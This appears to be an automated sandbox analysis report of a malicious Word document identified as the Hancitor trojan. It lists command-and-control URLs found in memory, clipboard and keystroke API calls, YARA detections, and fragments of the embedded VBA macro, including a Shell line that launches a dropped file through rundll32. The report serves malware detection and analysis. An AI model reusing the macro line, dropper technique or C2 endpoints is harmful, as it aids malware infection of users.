              Source: rundll32.exe, 00000005.00000003.1777395785.0000000002933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rhopulforopme.ru/8/forum.phpme.ru/8/forum.phpe
              Source: rundll32.exe, 00000005.00000003.1759002125.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2322656876.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2252179688.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1942123360.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2620736040.000000000291A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2669273371.000000000292F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1952161754.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2299435821.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2237144969.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2293982468.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2192261942.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2417726399.0000000002932000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2238857143.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2118717721.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2144410797.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2242990898.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2216357507.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2254606007.0000000002932000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2309854794.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2644212048.000000000292F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2224817943.0000000002934000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rhopulforopme.ru/8/forum.phps
              Source: rundll32.exe, 00000005.00000003.2504428556.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2266316387.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2423532675.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2270908150.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1793878117.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1952161754.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2210739764.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1937072968.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2242990898.0000000002954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rhopulforopme.ru/8/forum.phpv
              Source: splwow64.exe, 00000002.00000003.1442047761.000000000298A000.00000004.00000020.00020000.00000000.sdmp, splwow64.exe, 00000002.00000003.1443327802.0000000002998000.00000004.00000020.00020000.00000000.sdmp, splwow64.exe, 00000002.00000003.1445347987.0000000002998000.00000004.00000020.00020000.00000000.sdmp, splwow64.exe, 00000002.00000003.1442333308.0000000002998000.00000004.00000020.00020000.00000000.sdmp, splwow64.exe, 00000002.00000003.1444033953.0000000002998000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.m
              Source: rundll32.exe, 00000005.00000003.2212107841.000000000294C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2212107841.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2295617717.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2229738232.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2145848295.000000000295D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2244437133.000000000294C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1878016412.0000000002949000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2628991391.000000000295E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2008220028.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1870913373.0000000002949000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2329581893.000000000296E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2212107841.000000000295D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2216357507.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2199214201.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2254606007.0000000002932000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2309854794.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2145848295.0000000002949000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2154355980.000000000294C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2203720473.000000000295E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2644212048.000000000292F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2216357507.000000000295B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thowerteigime.com/8/forum.php
              Source: rundll32.exe, 00000005.00000003.2254606007.0000000002932000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thowerteigime.com/8/forum.php.ru/8/forum.ph
              Source: rundll32.exe, 00000005.00000003.2199214201.000000000295D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2278515571.000000000295E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2305462785.000000000295E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2254606007.000000000295D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2224817943.000000000295D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2238857143.000000000295D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2145848295.000000000295D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2628991391.000000000295E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2212107841.000000000295D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2203720473.000000000295E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2216357507.000000000295B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2008220028.000000000295B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2289863703.000000000295E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2295617717.000000000295E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1870913373.000000000295B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2244437133.000000000295C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2261262500.000000000295E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2309854794.000000000295D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2272679994.000000000295E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1759002125.0000000002949000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2229738232.000000000295B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thowerteigime.com/8/forum.phpCon
              Source: rundll32.exe, 00000005.00000003.2238857143.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2216357507.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2289863703.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2278515571.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2305462785.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2272679994.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2628991391.000000000292F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thowerteigime.com/8/forum.phpe.ru/8/forum.php
              Source: rundll32.exe, 00000005.00000003.2212107841.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2008220028.0000000002933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thowerteigime.com/8/forum.phpe.ru/8/forum.php7
              Source: rundll32.exe, 00000005.00000003.2199214201.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2309854794.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2224817943.0000000002934000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thowerteigime.com/8/forum.phpe.ru/8/forum.phpe
              Source: rundll32.exe, 00000005.00000003.2203720473.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2229738232.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2261262500.0000000002933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thowerteigime.com/8/forum.phpe.ru/8/forum.phps
              Source: rundll32.exe, 00000005.00000003.2620736040.000000000291A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2669273371.000000000292F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2644212048.000000000292F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2628991391.000000000292F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thowerteigime.com/8/forum.phper$
              Source: rundll32.exe, 00000005.00000003.2628991391.0000000002954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thowerteigime.com/8/forum.phpl
              Source: rundll32.exe, 00000005.00000003.2628991391.0000000002925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thowerteigime.com/8/forum.phporopme.ru5
              Source: rundll32.exe, 00000005.00000002.2669273371.0000000002925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thowerteigime.com/8/forum.phporopme.ruc
              Source: rundll32.exe, 00000005.00000003.1759002125.0000000002933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thowerteigime.com/8/forum.phpt.ru/8/forum.phpe
              Source: rundll32.exe, 00000005.00000003.2278515571.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2244437133.0000000002954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thowerteigime.com/8/forum.phpv
              Source: splwow64.exe, 00000002.00000003.1442047761.000000000298A000.00000004.00000020.00020000.00000000.sdmp, splwow64.exe, 00000002.00000003.1443327802.0000000002998000.00000004.00000020.00020000.00000000.sdmp, splwow64.exe, 00000002.00000003.1445347987.0000000002998000.00000004.00000020.00020000.00000000.sdmp, splwow64.exe, 00000002.00000003.1442333308.0000000002998000.00000004.00000020.00020000.00000000.sdmp, splwow64.exe, 00000002.00000003.1444033953.0000000002998000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
              Source: unknownDNS traffic detected: queries for: api.ipify.org
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_042D28D0 lstrlenA,lstrlenA,InternetCrackUrlA,InternetConnectA,HttpOpenRequestA,InternetCloseHandle,InternetQueryOptionA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,5_2_042D28D0
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Contains functionality to modify clipboard data
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_028024DC OpenClipboard,GlobalAlloc,GlobalFix,EmptyClipboard,SetClipboardData,GlobalUnWire,5_2_028024DC
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6624, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0282EA08 GetKeyboardState,5_2_0282EA08
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_028024DC OpenClipboard,GlobalAlloc,GlobalFix,EmptyClipboard,SetClipboardData,GlobalUnWire,5_2_028024DC
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027FB3B4 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,5_2_027FB3B4
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027FB9F8 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,5_2_027FB9F8
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02819B0C GetKeyState,GetKeyState,GetKeyState,5_2_02819B0C

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 0524_4109399728218.doc, type: SAMPLEMatched rule: Detects OLE documents with ObjectPool OLE storage and embed suspicous excutable files Author: ditekSHen
              Source: 5.2.rundll32.exe.28e0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Hancitor_6738d84a Author: unknown
              Source: 5.2.rundll32.exe.28e0000.2.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
              Source: 5.2.rundll32.exe.28d0174.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Hancitor_6738d84a Author: unknown
              Source: 5.2.rundll32.exe.42d0000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Hancitor_6738d84a Author: unknown
              Source: 5.2.rundll32.exe.28d0174.1.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
              Source: 5.2.rundll32.exe.42d0000.3.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
              Source: 5.2.rundll32.exe.28e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Hancitor_6738d84a Author: unknown
              Source: 5.2.rundll32.exe.28e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
              Source: 5.2.rundll32.exe.42d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Hancitor_6738d84a Author: unknown
              Source: 5.2.rundll32.exe.42d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
              Source: 5.2.rundll32.exe.28d0174.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Hancitor_6738d84a Author: unknown
              Source: 5.2.rundll32.exe.28d0174.1.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
              Source: 00000005.00000002.2668727144.00000000028D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Hancitor_6738d84a Author: unknown
              Source: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Hancitor_6738d84a Author: unknown
              Source: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Hancitor Payload Author: kevoreilly
              Source: 00000005.00000002.2668984250.00000000028E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Hancitor_6738d84a Author: unknown
              Source: 00000005.00000002.2668984250.00000000028E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Hancitor Payload Author: kevoreilly
              Source: Process Memory Space: rundll32.exe PID: 6624, type: MEMORYSTRMatched rule: Windows_Trojan_Hancitor_6738d84a Author: unknown
              Document contains OLE streams with names of living off the land binaries
              Source: ~WRF{C2D2D63F-941A-4D9F-9B45-35DA529A3C61}.tmp.1.drStream path '\x11_1744017892/VBA/ThisDocument' : ...............b...0...>...............)...................x...(j..H.G._oMq'T.@#......................Gjg.Mcs_......................x....Gjg.Mcs_(j..H.G._oMq....ME.....................P......S"....S.....S"....>"................L.....L.................<X......<`......<h......<p......<x......<..........(.1.N.o.r.m.a.l...T.h.i.s.D.o.c.u.m.e.n.t...............``.........,.......`....................0...k..............................`........`:.......`<...........%.......%.........D....`................................(...........(..............i\............6.......`.......................................................`@.........8.H......`.......................................................`^........ ...X.....(...................%...b*.`............@............h.........`.......H..............................&.................p.................x......4.0.~.6.8.*.>.......@... ...@.0..... ...@... ...@.H..... ...@.`..... ...@... ...@... ...........................`...(......`...(........................... ............3b...$.*.\.R.f.f.f.f.*.0.K.6.2.a.0.3.3.8.a....*.\.R.1.*.#.8.d....*.\.R.1.*.#.1.7.b....*.\.R.1.*.#.c.1....*.\.R.1.*.#.1.6.6....*.\.R.0.*.#.1.2....*.\.R.0.*.#.1.7.......h.................................................................>........................................."................. ........D.(........B.@..........`.................h.................p.......................................................D.........,.......J............(..........0..........8...".............................*...p..........P..........H..."......`..........@.......... ...................................................................."................H..........8................................................................................................................x..........(............................p..........................X....x....p...]..`..........]..p... .4. .0.%.2...'......... ......\ket.t..$.~...........A.6.....A.8..... .*...........d.x...].....].........exe'.<..... .4. .0.%.2...'.:....... .*. .:....\ket.t........rundll32 .<...... ... .4. .0.%.2........\ket.t,EUAYKIYBPAX....A@>.........k....k....o.......o.P... .H. .0.%.2... .@.%.F...A@D.........Scripting.FileSystemObject$.B.....@.......]..............o.... .J.B@Z......... .J.B@X......... .V..N.....R. .J.B@T......... .P..N.....R. .J.B@L......... .V..N.....R. .J.B@T......... .P..N.....R. .J.B@L..........H........o.h...|.H..... .`............ .`... .\.!.f.......... .^.......... .^.A@D........... .^... .\.!.d.................k..... .`.'.*. .`.!......jax.k...... .h.B@j..........b.......]...... ...]......H......G.Attribut.e VB_Nam.e = "Thi.sDocumen.t"...Bas..1Normal...VGlobal!.Spac.lFa.lse.Crea.tabl..Pre decla..Id..Tru.BExp.ose..Temp.lateDeri.v.$Custom.izC1Option Comp> Text....!.9lici..Di.m pafs A.s Sng.....P.6.: Su.b _Open()....ui....= ..s.De.faultFil.ePath(wdStartup... If Dir(...& "\ket..t")" T.hen..Cal`l yyyE.x|xx...V.....EBeA%iel1..*L6uP".exe.-.J.A./..She,(."rundll3`2" & .
              Office process drops PE file
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{9C081570-F32B-46C7-9B47-B1E0B2DF993E}\jax.kJump to dropped file
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile created: c:\users\user\appdata\roaming\microsoft\word\startup\ket.t (copy)Jump to dropped file
              Document contains an embedded VBA macro with suspicious strings
              Source: 0524_4109399728218.docOLE, VBA macro line: Shell ("rundll32" & ued & " " & Options.DefaultFilePath(wdStartupPath) & "\ket.t,EUAYKIYBPAX")
              Document contains an embedded macro with GUI obfuscation
              Source: ~WRF{C2D2D63F-941A-4D9F-9B45-35DA529A3C61}.tmp.1.drStream path '\x11_1744017892/VBA/ThisDocument' : Found suspicious string scripting.filesystemobject in non macro stream
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0282748C5_2_0282748C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027DD8045_2_027DD804
              Source: ~WRF{C2D2D63F-941A-4D9F-9B45-35DA529A3C61}.tmp.1.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
              Source: 0524_4109399728218.docOLE indicator, ObjectPool: true
              Source: 0524_4109399728218.doc, type: SAMPLEMatched rule: INDICATOR_OLE_ObjectPool_Embedded_Files author = ditekSHen, description = Detects OLE documents with ObjectPool OLE storage and embed suspicous excutable files
              Source: 5.2.rundll32.exe.28e0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Hancitor_6738d84a reference_sample = a674898f39377e538f9ec54197689c6fa15f00f51aa0b5cc75c2bafd86384a40, os = windows, severity = x86, creation_date = 2021-06-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Hancitor, fingerprint = 44a4dd7c35e0b4f3f161b82463d8f0ee113eaedbfabb7d914ce9486b6bd3a912, id = 6738d84a-7393-4db2-97cc-66f471b5699a, last_modified = 2021-08-23
              Source: 5.2.rundll32.exe.28e0000.2.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
              Source: 5.2.rundll32.exe.28d0174.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Hancitor_6738d84a reference_sample = a674898f39377e538f9ec54197689c6fa15f00f51aa0b5cc75c2bafd86384a40, os = windows, severity = x86, creation_date = 2021-06-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Hancitor, fingerprint = 44a4dd7c35e0b4f3f161b82463d8f0ee113eaedbfabb7d914ce9486b6bd3a912, id = 6738d84a-7393-4db2-97cc-66f471b5699a, last_modified = 2021-08-23
              Source: 5.2.rundll32.exe.42d0000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Hancitor_6738d84a reference_sample = a674898f39377e538f9ec54197689c6fa15f00f51aa0b5cc75c2bafd86384a40, os = windows, severity = x86, creation_date = 2021-06-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Hancitor, fingerprint = 44a4dd7c35e0b4f3f161b82463d8f0ee113eaedbfabb7d914ce9486b6bd3a912, id = 6738d84a-7393-4db2-97cc-66f471b5699a, last_modified = 2021-08-23
              Source: 5.2.rundll32.exe.28d0174.1.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
              Source: 5.2.rundll32.exe.42d0000.3.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
              Source: 5.2.rundll32.exe.28e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Hancitor_6738d84a reference_sample = a674898f39377e538f9ec54197689c6fa15f00f51aa0b5cc75c2bafd86384a40, os = windows, severity = x86, creation_date = 2021-06-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Hancitor, fingerprint = 44a4dd7c35e0b4f3f161b82463d8f0ee113eaedbfabb7d914ce9486b6bd3a912, id = 6738d84a-7393-4db2-97cc-66f471b5699a, last_modified = 2021-08-23
              Source: 5.2.rundll32.exe.28e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
              Source: 5.2.rundll32.exe.42d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Hancitor_6738d84a reference_sample = a674898f39377e538f9ec54197689c6fa15f00f51aa0b5cc75c2bafd86384a40, os = windows, severity = x86, creation_date = 2021-06-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Hancitor, fingerprint = 44a4dd7c35e0b4f3f161b82463d8f0ee113eaedbfabb7d914ce9486b6bd3a912, id = 6738d84a-7393-4db2-97cc-66f471b5699a, last_modified = 2021-08-23
              Source: 5.2.rundll32.exe.42d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
              Source: 5.2.rundll32.exe.28d0174.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Hancitor_6738d84a reference_sample = a674898f39377e538f9ec54197689c6fa15f00f51aa0b5cc75c2bafd86384a40, os = windows, severity = x86, creation_date = 2021-06-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Hancitor, fingerprint = 44a4dd7c35e0b4f3f161b82463d8f0ee113eaedbfabb7d914ce9486b6bd3a912, id = 6738d84a-7393-4db2-97cc-66f471b5699a, last_modified = 2021-08-23
              Source: 5.2.rundll32.exe.28d0174.1.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
              Source: 00000005.00000002.2668727144.00000000028D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Hancitor_6738d84a reference_sample = a674898f39377e538f9ec54197689c6fa15f00f51aa0b5cc75c2bafd86384a40, os = windows, severity = x86, creation_date = 2021-06-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Hancitor, fingerprint = 44a4dd7c35e0b4f3f161b82463d8f0ee113eaedbfabb7d914ce9486b6bd3a912, id = 6738d84a-7393-4db2-97cc-66f471b5699a, last_modified = 2021-08-23
